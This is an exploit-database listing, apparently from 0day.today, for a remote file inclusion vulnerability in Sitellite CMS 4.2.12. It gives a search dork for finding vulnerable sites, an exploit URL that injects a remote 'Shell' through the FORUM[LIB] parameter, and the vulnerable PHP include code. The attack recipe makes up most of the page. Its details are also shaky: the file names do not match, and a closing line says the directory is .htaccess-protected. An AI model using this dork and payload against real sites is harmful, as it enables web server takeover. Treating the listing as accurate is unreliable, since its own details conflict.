[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability

Author
o0xxdark0o
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1949
Category
web applications
Date add
13-06-2007
Platform
unsorted
========================================================================
Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability
========================================================================




*sitellite*<http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz>
v 4.2.12
DORK : "powered by Sitellite"
FOUND BY : o0xxdark0o
DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
REMOTE FILE ICLUDE
############################################################
FILE :
PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php
############################################################
EXP:
xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell
?
############################################################
CODE: on line 4
<?php
/** @package tests */
/** include tests */
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
require PEAR . 'test' . 'me';
include('file.ext');
include 'file.ext';
include(PEAR . 'test' . 'me');
?>
############################################################
thanks for all my friends. mr_6.1.9 .... oxdo .... cold z3ro
############################################################
BY : o0xxdark0o


PhpDocumentor directory is .htaccess'ed



#  0day.today [2024-11-16]  #